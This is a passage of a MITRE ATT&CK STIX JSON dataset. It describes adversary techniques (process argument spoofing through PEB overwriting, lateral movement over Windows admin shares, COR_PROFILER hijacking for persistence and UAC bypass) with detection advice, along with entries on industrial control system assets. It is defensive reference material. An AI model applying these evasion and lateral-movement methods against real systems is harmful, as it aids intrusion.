"https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm"}, {"source_name": "what_is_mmc", "description": "Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.", "url": "https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console"}, {"source_name": "phobos_virustotal", "description": "Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.", "url": "https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Process Argument Spoofing", "description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)\n\nAdversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) WriteProcessMemory() function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)\n\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)\n\nThis behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Detection of process argument spoofing may be difficult as adversaries may momentarily modify stored arguments used for malicious execution. These changes may bypass process creation detection and/or later process memory analysis. Consider monitoring for [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), which includes monitoring for process creation (especially those in a suspended state) as well as access and/or modifications of these processes (especially by the parent process) via Windows API calls.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not and/or do no align with its logged command-line arguments.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", "created": "2021-11-19T14:13:11.335Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/010", "external_id": "T1564.010"}, {"source_name": "Microsoft PEB 2021", "description": "Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.", "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb"}, {"source_name": "Xpn Argue Like Cobalt 2019", "description": "Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.", "url": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/"}, {"source_name": "Cobalt Strike Arguments 2019", "description": "Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.", "url": "https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/"}, {"source_name": "Nviso Spoof Command Line 2020", "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.", "url": "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/"}, {"source_name": "FireEye FiveHands April 2021", "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.", "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"}, {"source_name": "Mandiant Endpoint Evading 2019", "description": "Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.", "url": "https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Windows Admin Shares", "description": "Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. \n\nAdversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)\n\nThe [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials. (Citation: Technet Net Use)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne) (Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting Lateral Movement)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["Administrator"], "x_mitre_system_requirements": ["File and printer sharing over SMB enabled.\nHost/network firewalls not blocking SMB ports between source and destination.\nUse of domain account in administrator group on remote system or default system admin account."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ffe742ed-9100-4686-9e00-c331da544787", "created": "2017-05-31T21:31:00.200Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1077", "external_id": "T1077"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/561.html", "external_id": "CAPEC-561"}, {"source_name": "Wikipedia SMB", "description": "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.", "url": "https://en.wikipedia.org/wiki/Server_Message_Block"}, {"source_name": "TechNet RPC", "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.", "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx"}, {"source_name": "Microsoft Admin Shares", "description": "Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.", "url": "http://support.microsoft.com/kb/314984"}, {"source_name": "Technet Net Use", "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.", "url": "https://technet.microsoft.com/bb490717.aspx"}, {"source_name": "Lateral Movement Payne", "description": "Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. Retrieved February 1, 2016.", "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts"}, {"source_name": "Windows Event Forwarding Payne", "description": "Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.", "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem"}, {"source_name": "Medium Detecting Lateral Movement", "description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.", "url": "https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "COR_PROFILER", "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jesse Brown, Red Canary"], "x_mitre_detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", "created": "2020-06-24T22:30:55.843Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/012", "external_id": "T1574.012"}, {"source_name": "Microsoft Profiling Mar 2017", "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020.", "url": "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview"}, {"source_name": "Microsoft COR_PROFILER Feb 2013", "description": "Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020.", "url": "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)"}, {"source_name": "RedCanary Mockingbird May 2020", "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.", "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/"}, {"source_name": "Red Canary COR_PROFILER May 2020", "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020.", "url": "https://redcanary.com/blog/cor_profiler-for-persistence/"}, {"source_name": "Almond COR_PROFILER Apr 2019", "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020.", "url": "https://offsec.almond.consulting/UAC-bypass-dotnet.html"}, {"source_name": "GitHub OmerYa Invisi-Shell", "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020.", "url": "https://github.com/OmerYa/Invisi-Shell"}, {"source_name": "subTee .NET Profilers May 2017", "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020.", "url": "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-04T17:46:20.340Z", "name": "Application Server", "description": "Application servers are used across many different sectors to host various diverse software applications necessary to supporting the ICS. Example functions can include data analytics and reporting, alarm management, and the management/coordination of different control servers. The application server typically runs on a modern server operating system (e.g., MS Windows Server).", "x_mitre_sectors": ["General"], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "created": "2023-09-28T14:58:00.982Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0008", "external_id": "A0008"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_related_assets": [], "x_mitre_contributors": []}, {"modified": "2024-05-30T15:27:47.148Z", "name": "Applications (O365)", "description": "", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [], "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["Cloud", "Windows"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", "created": "2024-05-30T15:27:47.148Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": []}, {"modified": "2024-05-30T15:24:40.201Z", "name": "Cloud Infrastructure (IaaS)", "description": "", "x_mitre_sectors": [], "x_mitre_related_assets": [], "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["Cloud"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", "created": "2024-05-30T15:23:03.619Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0019", "external_id": "A0019"}], "object_marking_refs": []}, {"modified": "2024-05-30T15:25:05.583Z", "name": "Cloud Software (O365, Google Workspace, SaaS)", "description": "", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [], "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": [], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", "created": "2024-05-30T15:22:21.321Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0018", "external_id": "A0018"}], "object_marking_refs": []}, {"modified": "2024-05-30T15:26:58.383Z", "name": "Containers", "description": "", "x_mitre_sectors": [], "x_mitre_related_assets": [], "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["Cloud"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", "created": "2024-05-30T15:26:58.383Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0020", "external_id": "A0020"}], "object_marking_refs": []}, {"modified": "2023-10-04T18:09:59.538Z", "name": "Control Server", "description": "Control servers are typically a software platform that runs on a modern server operating system (e.g., MS Windows Server). The server typically uses one or more automation protocols (e.g., Modbus, DNP3) to communicate with the various low-level control devices such as Remote Terminal Units (RTUs) and Programmable Logic Controllers (PLCs). The control server also usually provides an interface/network service to connect with an HMI.", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [{"name": "Supervisory Control And Data Acquisition (SCADA) Server", "related_asset_sectors": ["General", "Electric", "Water and Wastewater"], "description": "A SCADA server is used to perform monitoring and control across a distributed environment. It typically has an associated HMI to provide information to a human operator and heavily depends on the human operator to initiate control actions."}, {"name": "Master Terminal Unit (MTU)", "related_asset_sectors": ["General"], "description": "*A controller that also acts as a server that hosts the control software that communicates with lower-level control devices, such as remote terminal units (RTUs) and programmable logic controllers (PLCs), over an ICS network* (Citation: Guidance - NIST SP800-82)"}, {"name": "Supervisory controller", "related_asset_sectors": ["General"], "description": "*A controller that also acts as a server that hosts the control software that communicates with lower-level control devices, such as remote terminal units (RTUs) and programmable logic controllers (PLCs), over an ICS network* (Citation: Guidance - NIST SP800-82)"}, {"name": "Distribution/Energy Management System (DMS/EMS)", "related_asset_sectors": ["Electric"], "description": "A DMS and EMS are electric sector specific devices that are commonly used to manage distribution and transmission-level electrical grids. These platforms typically integrate a SCADA server and HMI with domain-specific data analysis applications, such as state-estimation and contingency analysis (EMS), or voltage-var control or fault restoration (DMS). "}], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "created": "2023-09-28T14:55:39.339Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0007", "external_id": "A0007"}, {"source_name": "Guidance - NIST SP800-82", "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-04T18:08:33.386Z", "name": "Data Gateway", "description": "Data Gateway is a device that supports the communication and exchange of data between different systems, networks, or protocols within the ICS. Different types of data gateways are used to perform various functions, including:\n\n * Protocol Translation: Enable communication to devices that support different or incompatible protocols by translating information from one protocol to another. \n * Media Converter: Convert data across different Layer 1 and 2 network protocols / mediums, for example, converting from Serial to Ethernet. \n * Data Aggregation: Collect and combine data from different devices into one consistent format and protocol interface. \n\nData gateways are often critical to the forwarding/transmission of critical control or monitoring data within the ICS. Further, these devices often have remote various network services that are used to communicate across different zones or networks. \n\nThese assets may focus on a single function listed below or combinations of these functions to best fit the industry use-case. \n", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [{"name": "Data Acquisition Server (DAS)", "related_asset_sectors": ["General"], "description": "A Data Acquisition Server (DAS) a system or software platform that is used to collect, aggregate, and store data/telemetry from field devices using various SCADA/Automation protocols. "}, {"name": "Serial to Ethernet Gateway", "related_asset_sectors": ["Electric", "General"], "description": "A Serial to Ethernet gateway is a device that is used to connect field devices that only support serial-based communication (e.g., RS-232) with more modern Ethernet-based networks. "}], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "Embedded"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "created": "2023-09-28T15:01:48.509Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0009", "external_id": "A0009"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-04T17:57:56.558Z", "name": "Data Historian", "description": "Data historians, or historian, are systems used to collect and store data, including telemetry, events, alerts, and alarms about the operational process and supporting devices. The historian typically utilizes a database to store this data, and commonly provide tools and interfaces to support the analysis of the data. Data historians are often used to support various engineering or business analysis functions and therefore commonly needs access from the corporate network. Data historians often work in a hierarchical paradigm where lower/site level historians collect and store data which is then aggregated into a site/plant level historian. Therefore, data historians often have remote services that can be accessed externally from the ICS network.", "x_mitre_sectors": ["General"], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "Embedded"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "created": "2023-09-28T14:48:36.305Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0006", "external_id": "A0006"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_related_assets": [], "x_mitre_contributors": []}, {"modified": "2024-05-21T16:23:41.133Z", "name": "Endpoint/Server (OS:Windows)", "description": "", "x_mitre_sectors": [], "x_mitre_related_assets": [], "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["Windows"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "0.2", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "created": "2024-05-21T16:23:19.410Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0016", "external_id": "A0016"}], "object_marking_refs": []}, {"modified": "2024-05-30T15:19:02.847Z", "name": "Endpoint/Server: (OS Linux)", "description": "", "x_mitre_sectors": [], "x_mitre_related_assets": [{"name": "Jump Host", "related_asset_sectors": [], "description": ""}, {"name": "HMI", "related_asset_sectors": [], "description": ""}, {"name": "Control Server", "related_asset_sectors": [], "description": ""}], "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["Linux"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "0.2", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "created": "2024-05-21T16:19:57.018Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0015", "external_id": "A0015"}], "object_marking_refs": []}, {"modified": "2023-10-04T19:26:49.788Z", "name": "Field I/O", "description": "Field I/O are devices that communicate with a controller or data aggregator to either send input data or receive output data. Input data may include readings about a given environment/device state from sensors, while output data may include data sent back to actuators for them to either undertake actions or change parameter values.(Citation: Guidance - NIST SP800-82) These devices are frequently embedded devices running on lightweight embedded operating systems or RTOSes. ", "x_mitre_related_assets": [{"name": "Smart Sensors", "related_asset_sectors": ["General"], "description": "*A device that procures a voltage or current output that is representative of some physical property being measured (e.g., speed, temperature, flow).* (Citation: Guidance - NIST SP800-82) Smart sensors take this functionality and add on on-device processing and network communication."}, {"name": "Variable Frequency Drive (VFD)", "related_asset_sectors": ["General"], "description": "*A type of drive that controls the speed, but not the precise position, of a non-servo, AC motor by varying the frequency of the electricity going to that motor. VFDs are typically used for applications where speed and power are important, but precise positioning is not.* (Citation: Guidance - NIST SP800-82) VFDs can be network connected."}], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Embedded"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "created": "2023-09-28T17:57:22.946Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0013", "external_id": "A0013"}, {"source_name": "Guidance - NIST SP800-82", "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_sectors": [], "x_mitre_contributors": []}, {"modified": "2024-05-30T15:28:49.087Z", "name": "Firewall", "description": "", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [], "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["Network"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "type": "x-mitre-asset", "spec_version": "2.1", "id": "x-mitre-asset--a2747432-b914-4bfb-b905-ef44f446a3ff", "created": "2024-05-30T15:28:49.087Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/assets/A0021", "external_id": "A0021"}], "object_marking_refs": []}, {"modified": "2023-10-04T17:59:11.489Z", "name": "Human-Machine Interface (HMI)", "description": "Human-Machine Interfaces (HMIs) are systems used by an operator to monitor the real-time status of an operational process and to perform necessary control functions, including the adjustment of device parameters. An HMI can take various forms, including a dedicated screen or control panel integrated with a specific device/controller, or a customizable software GUI application running on a standard operating system (e.g., MS Windows) that interfaces with a control/SCADA server. The HMI is critical to ensuring operators have sufficient visibility and control over the operational process.", "x_mitre_sectors": ["General"], "x_mitre_related_assets": [{"name": "Operator Workstation (OWS)", "related_asset_sectors": ["General"], "description": "An Operator Workstation (OWS) or Console is a system or device used by an operator to interface with a control system, including to access/visualizes key information or parameters about the operational process and initiate control actions. This typically consists of specialized OWS software installed on a Workstation platform. (Citation: IEC February 2019)"}], "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux"], "x_mitre_deprecated": false, "x_mitre_domains": ["ics-attack"], "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "3.2.0", "type": "x-mitre-asset", "spec_version": "2.1", "id": 